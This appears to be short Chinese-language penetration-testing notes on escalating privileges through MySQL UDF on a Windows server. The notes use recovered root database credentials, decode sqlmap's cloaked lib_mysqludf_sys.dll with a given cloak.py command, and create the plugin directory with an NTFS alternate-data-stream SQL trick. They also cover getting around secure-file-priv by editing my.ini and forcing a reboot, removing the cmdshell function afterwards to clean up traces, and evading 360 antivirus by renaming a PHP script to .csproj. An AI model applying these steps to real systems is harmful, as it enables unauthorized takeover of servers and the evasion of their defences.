1、对apache中间件进行降权处理 用户组为users
2、寻找数据库的信息
进行拼接密码然后解密得到 账号:root 密码:root
3、利用sqlmap的udf进行提权操作
因为sqlmap的udf脚本是经过加密处理的所以还需要sqlmap\extra\cloak\cloak\cloak.py进行解码操作
python cloak.py -d -i D:\ATTACK\Sql_inject\sqlmap\udf\mysql\windows\64\lib_mysqludf_sys.dll_
ps. 这里如果无法创建文件夹plugin 可以尝试用过NTFS ADS进行突破创建
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';
4、进行数据库的操作提权
利用菜刀之类的数据库管理进行操作
写入的时候发现:–secure-file-priv 所以我们还需要去修改mysql的配置文件my.ini
ps.当secure-file-priv参数为NULL的时候 读写操作都只能在当前目录哈
让my.ini重新生效的方法
1、直接重启shutdown -r
2、等管理员重启
drop function cmdshell; 删除函数
delete from mysql.func where name='cmdshell' 删除函数
ps. 不会免杀 对于udf提权的话 市面上的udf.dll udf的提权脚本基本遇到360之类的杀毒软件都GG思密达 但是可能能通过以下方法来绕过:将自己要提权的php脚本后缀修改为csproj 然后再通过包含文件